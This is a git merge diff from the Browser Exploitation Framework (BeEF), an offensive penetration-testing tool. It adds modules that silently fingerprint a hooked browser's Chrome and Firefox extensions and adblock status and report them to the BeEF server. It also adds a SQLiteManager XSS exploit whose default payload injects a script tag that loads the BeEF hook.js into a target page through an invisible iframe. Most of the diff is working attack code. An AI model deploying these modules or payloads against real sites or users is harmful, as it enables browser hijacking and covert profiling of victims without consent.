Merge branch 'master' of https://github.com/beefproject/beef

extensions/evasion/config.yaml

@@ -9,7 +9,7 @@ beef:
             enable: true
             name: 'Evasion'
             authors: ["antisnatchor"]
-            exclude_core_js: ["lib/jquery-1.5.2.min.js", "lib/json2.js", "lib/jools.min.js","lib/mdetect.js"]
+            exclude_core_js: ["lib/jquery-1.5.2.min.js", "lib/json2.js", "lib/jools.min.js", "lib/mdetect.js"]
             scramble_variables: true
             scramble_cookies: true
             scramble:

modules/browser/avant_steal_history/module.rb

@@ -21,7 +21,7 @@ class Avant_steal_history < BeEF::Core::Command
 		
 
 		return [
-			{'name' => 'cId', 'ui_label' => 'Command ID:', 'value' => '60003', 'type' => 'textarea', 'width' => '400px', 'height' => '25px' }
+			{'name' => 'cId', 'ui_label' => 'Command ID', 'value' => '60003', 'type' => 'textarea', 'width' => '400px', 'height' => '25px' }
 		]
 
 	end

modules/browser/detect_extensions/command.js

@@ -6,7 +6,7 @@
 
 beef.execute(function() {
 
-	extensions = new Array(
+	chrome_extensions = new Array(
 		new Array("blpcfgokakmgnkcojhhkbfbldkacnbeo","YouTube"),
 		new Array("pjkljhegncpnkpknbcohdijeoejaedia","Gmail"),
 		new Array("coobgpohoikkiipiblmjeljniedjpjpf","Google Search"),
@@ -1009,7 +1009,61 @@ beef.execute(function() {
 		new Array("inolmjbojghkehmmlbdmpdlmagalddni","Jagran - India No.1 Hindi News Daily")
 	);
 
-	var detect = function(addon_id, addon_name) {
+        var firefox_extensions = {
+                "Adblock Plus" : "chrome://adblockplus/skin/adblockplus.png",
+                "Auto Copy" : "chrome://autocopy/skin/autocopy.png",
+                "ColorZilla" : "chrome://colorzilla/skin/logo.png",
+                "Customize Google" : "chrome://customizegoogle/skin/32x32.png",
+                "DownThemAll!" : "chrome://dta/content/immagini/icon.png",
+                "Faster Fox" : "chrome://fasterfox/skin/icon.png",
+                "Flash Block" : "chrome://flashblock/skin/flash-on-24.png",
+                "FlashGot" : "chrome://flashgot/skin/icon32.png",
+                "Forecastfox" : "chrome://forecastfox/skin/images/icon.png",
+                "Google Toolbar" : "chrome://google-toolbar/skin/icon.png",
+                "Greasemonkey" : "chrome://greasemonkey/content/status_on.gif",
+                "IE Tab" : "chrome://ietab/skin/ietab-button-ie16.png",
+                "IE View" : "chrome://ieview/skin/ieview-icon.png",
+                "JS View" : "chrome://jsview/skin/jsview.gif",
+                "Live HTTP Headers" : "chrome://livehttpheaders/skin/img/Logo.png",
+                "MeasureIt" : "chrome://measureit/skin/measureit.png",
+                "SEO For Firefox" : "chrome://seo4firefox/content/icon32.png",
+                "SEOpen" : "chrome://seopen/skin/seopen.png",
+                "Search Status" : "chrome://searchstatus/skin/cax10.png",
+                "Server Switcher" : "chrome://switcher/skin/icon.png",
+                "StumbleUpon" : "chrome://stumbleupon/content/skin/logo32.png",
+                "Tab Mix Plus" : "chrome://tabmixplus/skin/tmp.png",
+                "Torrent-Search Toolbar" : "chrome://torrent-search/skin/v.png",
+                "User Agent Switcher" : "chrome://useragentswitcher/content/logo.png",
+                "View Source With" : "chrome://viewsourcewith/skin/ff/tb16.png",
+                "Web Developer" : "chrome://webdeveloper/content/images/logo.png",
+                "Unhide Passwords" : "chrome://unhidepw/skin/unhidepw.png",
+                "UrlParams" : "chrome://urlparams/skin/urlparams32.png",
+                "NewsFox" : "chrome://newsfox/skin/images/home.png",
+                "Add N Edit Cookies" : "chrome://addneditcookies/skin/images/anec32.png",
+                "GTDGmail" : "chrome://gtdgmail/content/gtd_lineitem.png",
+                "QuickJava" : "chrome://quickjava/content/js.png",
+                "Adblock Filterset.G Updater" : "chrome://unplug/skin/unplug.png",
+                "BBCode" : "chrome://bbcode/skin/bbcode.png",
+                "BugMeNot" : "chrome://bugmenot/skin/bugmenot.png",
+                "ConQuery" : "chrome://conquery/skin/conquery.png",
+                "Download Manager Tweak" : "chrome://downloadmgr/skin/downloadIcon.png",
+                "Extended Cookie Manager" : "chrome://xcm/content/allowed.png",
+                "FireBug" : "chrome://firebug/content/firebug32.png",
+                "FoxyTunes" : "chrome://foxytunes/skin/logo.png",
+                "MR Tech Disable XPI Install Delay" : "chrome://disable_xpi_delay/content/icon.png",
+                "SessionSaver .2" : "chrome://sessionsaver/content/ss.png",
+                "spooFX" : "chrome://spoofx/skin/main/spoofx.png",
+                "Statusbar Clock" : "chrome://timestatus/skin/icon.png",
+                "Torbutton" : "chrome://torbutton/skin/bigbutton_gr.png",
+                "UnPlug" : "chrome://unplug/skin/unplug.png",
+                "View Source Chart" : "chrome://vrs/skin/vrssmall.png",
+                "XPather" : "chrome://xpather/content/iconka.png",
+                "WOT" : "chrome://wot/skin/fusion/logo.png",
+                "LastPass" : "chrome://lastpass/skin/vaultdelete.png",
+
+        };
+
+	var detect_chrome_extension = function(addon_id, addon_name) {
 		var s = document.createElement('script');
 		s.onload = function() {
 			beef.net.send('<%= @command_url %>', <%= @command_id %>, 'extension='+addon_name);
@@ -1018,11 +1072,29 @@ beef.execute(function() {
 		document.body.appendChild(s);
 	}
 
-	try {
-		for (var i=0; i<extensions.length; i++) {
-			detect(extensions[i][0], extensions[i][1]);
-		}
-	} catch(e) {}
+        var detect_firefox_extension = function(addon_url, addon_name) {
+                var img = document.createElement("img");
+                img.setAttribute("border", '0');
+                img.setAttribute("width", '0');
+                img.setAttribute("height", '0');
+                img.setAttribute("onload", "beef.net.send('<%= @command_url %>', <%= @command_id %>, 'extension=" + addon_name+ "');");
+                img.setAttribute("src", addon_url);
+        }
+
+        if(beef.browser.isC()) {
+                try {
+                        for (var i=0; i<chrome_extensions.length; i++) {
+                                detect_chrome_extension(chrome_extensions[i][0], chrome_extensions[i][1]);
+                        }
+                } catch(e) {}
+        } else if(beef.browser.isFF()) {
+                try {
+                        for (var i in firefox_extensions) {
+                                detect_firefox_extension(firefox_extensions[i], i);
+                        }
+                } catch(e) {}
+        } else {
+        };
 
 });
 

modules/browser/detect_extensions/config.yaml

@@ -0,0 +1,22 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+    module:
+        detect_extensions:
+            enable: true
+            category: "Browser"
+            name: "Detect Chrome/Firefox Extensions"
+            description: "This module detects Extensions in Chrome and Firefox "
+            authors: ["koto", "bcoles", "nbblrr"]
+            target:
+                working:
+                    FF:
+                        min_ver: 1
+                        max_ver: latest
+                    C:
+                        min_ver: 1
+                        max_ver: 18
+                not_working: ["All"]

modules/browser/detect_extensions/module.rb

@@ -5,14 +5,15 @@
 #
 # More info:
 #	http://blog.kotowicz.net/2012/02/intro-to-chrome-addons-hacking.html
+#	http://jeremiahgrossman.blogspot.fr/2006/08/i-know-what-youve-got-firefox.html
 #
-class Detect_chrome_extensions < BeEF::Core::Command
+class Detect_extensions < BeEF::Core::Command
 
   def post_execute
     content = {}
     content['extension'] = @datastore['extension']
     save content
   end
-  
+
 end
 

modules/browser/detect_simple_adblock/command.js

@@ -0,0 +1,40 @@
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function() {
+
+	if (document.getElementById('adblock_img')) {
+		return "Img already created";
+	}
+
+	var img = new Image();
+	img.setAttribute("style","visibility:hidden");
+	img.setAttribute("width","0");
+	img.setAttribute("height","0");
+	img.src = 'http://simple-adblock.com/adblocktest/files/adbanner.gif';
+	img.id = 'adblock_img';
+	img.setAttribute("attr","start");
+	img.onerror = function() {
+		this.setAttribute("attr","error");
+	};
+	img.onload = function() {
+		this.setAttribute("attr","load");
+	};
+
+	document.body.appendChild(img);
+
+	setTimeout(function() {
+		var img = document.getElementById('adblock_img');	
+		if (img.getAttribute("attr") == "error") {
+			beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=Adblock returned an error');
+		} else if (img.getAttribute("attr") == "load") {
+			beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=Adblock is disabled or not installed');
+		} else if (img.getAttribute("attr") == "start") {
+			beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=Adblock is enabled');
+		};
+		document.body.removeChild(img);
+		}, 10000);
+
+});

modules/browser/detect_simple_adblock/config.yaml

@@ -0,0 +1,16 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+    module:
+        detect_simple_adblock:
+            enable: true
+            category: "Browser"
+            name: "Detect Simple Adblock"
+            description: "This module checks if the Simple Adblock module is active."
+            authors: ["sussurro"]
+            target:
+                 working: ["IE"]
+                 not_working: ["All"]

modules/browser/detect_simple_adblock/module.rb

@@ -0,0 +1,14 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+class Detect_simple_adblock< BeEF::Core::Command
+
+	def post_execute 
+		content = {}
+		content['simple_adblock'] = @datastore['simple_adblock'] if not @datastore['simple_adblock'].nil?
+		save content
+	end
+
+end

modules/chrome_extensions/get_chrome_extensions/config.yaml

@@ -1,16 +0,0 @@
-#
-# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
-# Browser Exploitation Framework (BeEF) - http://beefproject.com
-# See the file 'doc/COPYING' for copying permission
-#
-beef:
-    module:
-        detect_chrome_extensions:
-            enable: true
-            category: "Chrome Extensions"
-            name: "Get Chrome Extensions"
-            description: "This module detects if any of the top 1,000 Chrome extensions are installed."
-            authors: ["koto", "bcoles"]
-            target:
-                working: ["C"]
-                not_working: ["All"]

modules/exploits/sqlitemanager_xss/command.js

@@ -0,0 +1,17 @@
+//
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function() {
+
+	var uri = '<%= @uri.gsub(/'/, "\\'") %>'; 
+
+	var serendipity_iframe = beef.dom.createInvisibleIframe();
+	serendipity_iframe.setAttribute('src', uri);
+
+	beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
+
+});
+

modules/exploits/sqlitemanager_xss/config.yaml

@@ -0,0 +1,15 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+    module:
+        sqlitemanager_xss:
+            enable: true
+            category: ["Exploits", "XSS"]
+            name: "SQLiteManager XSS"
+            description: "Attempts to hook SQLiteManager using XSS.<br/>Tested on version 1.2.4 however other versions are likely to be vulnerable."
+            authors: ["bcoles"]
+            target:
+                unknown: ["ALL"]

modules/exploits/sqlitemanager_xss/module.rb

@@ -0,0 +1,23 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+class Sqlitemanager_xss < BeEF::Core::Command
+
+	def self.options
+
+		configuration = BeEF::Core::Configuration.instance
+		hook_uri = "http://#{configuration.get("beef.http.host")}:#{configuration.get("beef.http.port")}/hook.js"
+
+		return [
+			{'name' => 'uri', 'ui_label' => 'Target URL', 'value' => 'http://127.0.0.1/sqlite/index.php?dbsel=1"><script src="'+hook_uri+'"></script><p+"'}
+		]
+
+	end
+
+	def post_execute
+		save({'result' => @datastore['result']})
+	end
+
+end

modules/phonegap/phonegap_check_connection/config.yaml

@@ -10,8 +10,8 @@ beef:
         phonegap_check_connection:
             enable: true
             category: "Phonegap"
-            name: "Check connection"
-            description: "Find out connection type e.g. Wifi, 3G.."
+            name: "Check Connection"
+            description: "Find out the network connection type e.g. Wifi, 3G."
             authors: ["mh"]
             target:
                 working: ["All"]